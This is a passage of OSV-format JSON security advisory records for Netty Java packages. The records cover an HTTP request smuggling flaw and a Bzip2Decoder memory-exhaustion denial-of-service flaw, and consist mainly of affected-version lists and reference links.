"3.0.0.CR3", "3.0.0.CR4", 
"3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-f256-j965-7f32/GHSA-f256-j965-7f32.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", 
"4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-f256-j965-7f32/GHSA-f256-j965-7f32.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32" }, { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/b0fa4d5aab4215f3c22ce6123dd8dd5f38dc0432" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re39391adcb863f0e9f3f15e7986255948f263f02e4700b82453e7102@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re1911e05c08f3ec2bab85744d788773519a0afb27272a31ac2a0b4e8@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd5715f3ee5e3216d5e0083a07994f67da6dbb9731ce9e7a6389b18e@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd206d9dd7eb894cc089b37fe6edde2932de88d63a6d8368b44f5101@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4a6b7dec38ea6cd28b6f94bd4b312629a52b80be3786d5fb0e474bc@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcae42fba06979934208bbd515584b241d3ad01d1bb8b063512644362@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca0978b634a0c3ebee4126ec29c7f570b165fae3f8f3658754c1cbd3@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rbde2f13daf4911504f0eaea43eee4f42555241b5f6d9d71564b6c5fa@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba2a9ef1d0af882ab58fadb336a58818495245dda43d32a7d7837187@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rafc77f9f03031297394f3d372ccea751b23576f8a2ae9b6b053894c5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rac8cf45a1bab9ead5c9a860cbadd6faaeb7792203617b6ec3874736d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa413040db6d2197593cc03edecfd168732e697119e6447b0a25d525@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra66e93703e3f4bd31bdfd0b6fb0c32ae96b528259bb1aa2b6d38e401@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4b0141939370304d676fe23774d0c6fbc584b648919825402d0cb39@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re7c69756a102bebce8b8681882844a53e2f23975a189363e68ad0324@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9e6ed60941da831675de2f8f733c026757fb4fa28a7b6c9f3dfb575@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/redef0fb5474fd686781007de9ddb852b24f1b04131a248d9a4789183@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf148b2bf6c2754153a8629bc7495e216bd0bd4c915695486542a10b4@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf38e4dcdefc7c59f7ba0799a399d6d6e37b555d406a1dfc2fcbf0b35@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rf521ff2be2e2dd38984174d3451e6ee935c845948845c8fccd86371d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf934292a4a1c189827f625d567838d2c1001e4739b158638d844105b@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210604-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21295" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b09f3e31e004fe583f677f7afa46bd30110904576c13c5ac818ac2c@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0ca82fec33334e571fe5b388272260778883e307e15415d7b1443de2@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r101f82d8f3b5af0bf79aecbd5b2dd3b404f6bb51d1a54c2c3d29bed9@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b3cb056364794f919aaf26ceaf7423de64e7fdd05a914066e7d5219@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2732aa3884cacfecac4c54cfaa77c279ba815cad44b464a567216f83@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31044fb995e894749cb821c6fe56f487c16a97028e6e360e59f09d58@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r4a98827bb4a7edbd69ef862f2351391845697c40711820d10df52ca5@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b8be87acf5b9c098a2ee350b5ca5716fe7afeaf0a21a4ee45a90687@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4ea2f1a9d79d4fc1896e085f31fb60a21b1770d0a26a5250f849372d@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5baac01f9e06c40ff7aab209d5751b3b58802c63734e33324b70a06a@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5cbea8614812289a9b98d0cfc54b47f54cef424ac98d5e315b791795@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f2f120b2b8d099226473db1832ffb4d7c1d6dc2d228a164bf293a8e@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r602e98daacc98934f097f07f2eed6eb07c18bfc1949c8489dc7bfcf5@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61564d86a75403b854cdafee67fc69c8b88c5f6802c2c838f4282cc8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r69efd8ef003f612c43e4154e788ca3b1f837feaacd16d97854402355@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dac9bd799ceac499c7a7e152a9b0dc7f2fe7f89ec5605d129bb047b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70c3a7bfa904f06a1902f4df20ee26e4f09a46b8fd3eb304dc57a2de@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r7879ddcb990c835c6b246654770d836f9d031dee982be836744e50ed@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b54563abebe3dbbe421e1ba075c2030d8d460372f8c79b7789684b6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r823d4b27fcba8dad5fe945bdefce3ca5a0031187966eb6ef3cc22ba9@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r855b4b6814ac829ce2d48dd9d8138d07f33387e710de798ee92c011e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r967002f0939e69bdec58f070735a19dd57c1f2b8f817949ca17cddae@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ec78dc409f3f1edff88f21cab53737f36aad46f582a9825389092e0@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9fe840c36b74f92b8d4a089ada1f9fd1d6293742efa18b10e06b66d2@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra64d56a8a331ffd7bdcd24a9aaaeeedeacd5d639f5a683389123f898@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra655e5cec74d1ddf62adacb71d398abd96f3ea2c588f6bbf048348eb@%3Cissues.kudu.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2021-03-30T15:03:26Z", "nvd_published_at": "2021-03-30T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-grg4-wf29-r9vv", "published": "2021-09-09T17:11:21Z", "modified": "2024-03-11T05:19:43.929590Z", "aliases": [ "CVE-2021-37136" ], "related": [ "CGA-xpcq-6m7h-f8qc", "CVE-2021-37136" ], "summary": "Bzip2Decoder doesn't allow setting size restrictions for decompressed data", "details": 
"### Impact\nThe Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression).\n\n\nAll users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack\n\n### Workarounds\nNo workarounds other than not using the `Bzip2Decoder`\n\n### References\n\nRelevant code areas:\n\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305", "affected": [ { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.68.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", 
"4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", 
"3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", 
"4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/41d3d61a61608f2223bb364955ab2045dd5e4020" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0012" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-09-09T14:36:56Z", "nvd_published_at": "2021-10-19T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p2v9-g2qv-p635", "published": "2020-02-21T18:55:04Z", "modified": "2024-12-08T05:34:35.794525Z", "aliases": [ "CVE-2019-20445" ], "related": [ "CGA-3hw4-v37p-xv4c", "CGA-f836-4mqx-vr2w" ], "summary": "HTTP Request Smuggling in Netty", "details": "HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.45" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", 
"4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.5.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", 
"3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", 